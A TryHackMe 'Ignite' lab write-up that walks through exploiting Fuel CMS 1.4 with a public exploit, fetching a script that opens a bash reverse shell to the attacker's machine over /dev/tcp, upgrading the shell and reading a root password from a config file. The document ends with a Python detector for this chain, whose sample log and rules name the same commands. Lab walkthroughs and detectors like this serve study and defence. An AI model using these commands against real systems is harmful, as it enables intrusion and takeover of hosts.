Ignite – TryHackMe Writeup

Introduction:

The purpose of this writeup is to document the steps I took to complete the hacking tasks in the Ignite room on TryHackMe.com (THM).

Resources/Tools Used:

[Task 1] Root it!

Root the box!

#1 User.txt

  • Deployed the machine and browsed to the website.
Webpage
  • Noticed the website was running Fuel CMS version 1.4. While reading the information on this page, noticed the credentials listed.
CMS credentials
  • Used these credentials to log in to the CMS and noticed we can upload files on this server.
CMS login
  • With the CMS version known, used searchsploit to check whether any exploit is available for Fuel CMS.
Fuel CMS searchsploit
  • Copied the exploit code to the local directory to view the code.
Exploit copy
  • Updated the IP address to reflect the IP address of the target machine.
IP address update
  • As we will not be using a proxy (Burp or any other proxy software), commented out the proxy code in the exploit.
Comment out proxy variable
  • Executed the code and got a shell.
Exploit successful
  • Searched for bash
bash
  • Visited the pentest monkey website to get bash reverse shell.
pentestmonkey.net bash reverse shell
  • Copied the above code to a file “rev.sh” and updated it to reflect my local IP and port so we may get the reverse shell.

bash -i >& /dev/tcp/10.9.7.63/4444 0>&1

  • Started netcat listener on port 4444.
netcat listener
  • Started a webserver to host “rev.sh” and access it from target machine.
Hosting server
  • Downloaded the file on the target machine.
Downloaded rev.sh to target machine
  • Changed permissions of the file “rev.sh” so we may execute it on the target machine.
Changed permission of rev.sh
  • Ran the “rev.sh” file to get a shell from the target machine.
Executed rev.sh
  • Got a shell on the local machine.
Shell access
  • Browsed to “/home/www-data” directory and got “User.txt” file.
Flag 1

#2 Root.txt

  • Entered the “sudo -l” command but it did not work as we did not have a terminal shell.
Non-terminal shell
  • To get a terminal shell, entered the following command:

python -c "import pty;pty.spawn('/bin/bash')"

  • Backgrounded the session using CTRL+Z.
  • Then entered the following command:

stty raw -echo

  • Brought the backgrounded session to the foreground with the following command:

fg 1

Terminal shell
  • Then entered “sudo -l” but a password prompt was shown. As we don’t have the password, we did not pursue this further.
sudo -l
  • During initial reconnaissance we noticed some instructions related to database configuration on the webpage.
DB config file
  • Browsed to the configuration file to see if we can find a username:password pair.
DB configuration
  • Upon reviewing the configuration file, found the root password in it.
Root password
  • After getting the root password, used the “su root” command and entered the newly discovered password to get root access.
Root access
  • Browsed to the “/root” directory to get the root flag by reading the contents of the file “root.txt”.
Flag 2
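
From the defender's side, the steps above leave a recognizable sequence in process-execution logs: the web-server account fetching a file, making it executable, starting an interactive shell, spawning a pty and probing sudo/su. The Python sketch below is an added example, not part of the original writeup; the "user=… cmd=…" record format, the sample lines, the wget/curl rule, the rule names and the threshold are constructed assumptions.

```python
import re

# Constructed sample of process-execution records. The "user=<name> cmd=<argv>"
# layout is an assumption; adapt parse() to your auditd or EDR export.
SAMPLE_LOG = """\
user=www-data cmd=php-fpm: pool www
user=www-data cmd=wget http://198.51.100.7:8000/rev.sh
user=www-data cmd=chmod +x rev.sh
user=www-data cmd=./rev.sh
user=www-data cmd=bash -i
user=www-data cmd=python -c import pty;pty.spawn('/bin/bash')
user=www-data cmd=sudo -l
user=www-data cmd=su root
user=alice cmd=python -c import pty;pty.spawn('/bin/bash')
user=root cmd=chmod +x /usr/local/bin/backup.sh
"""

# Accounts that should never run interactive tooling (assumed list).
SERVICE_ACCOUNTS = {"www-data"}

# One rule per stage of the chain described in the writeup.
RULES = {
    "download_tool": re.compile(r"^(wget|curl)\b"),
    "make_executable": re.compile(r"^chmod\s+\S*\+x\b"),
    "interactive_shell": re.compile(r"^(ba)?sh\s+-i\b|/dev/tcp/"),
    "pty_upgrade": re.compile(r"pty\.spawn"),
    "priv_probe": re.compile(r"^(sudo\s+-l|su\b)"),
}

def parse(line):
    """Return (user, cmd) for a well-formed record, else None."""
    m = re.match(r"user=(\S+) cmd=(.*)$", line)
    return (m.group(1), m.group(2)) if m else None

def detect(log_text, threshold=3):
    """Map each service account to the distinct stages it triggered,
    keeping only accounts that reached `threshold` or more stages."""
    hits = {}
    for line in log_text.splitlines():
        rec = parse(line)
        if not rec or rec[0] not in SERVICE_ACCOUNTS:
            continue
        user, cmd = rec
        for name, rx in RULES.items():
            if rx.search(cmd) and name not in hits.setdefault(user, []):
                hits[user].append(name)
    return {u: names for u, names in hits.items() if len(names) >= threshold}

if __name__ == "__main__":
    print(detect(SAMPLE_LOG))
```

Requiring several distinct stages from the same service account keeps a single legitimate curl or chmod from raising an alert.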

I hope this helped. Thanks.
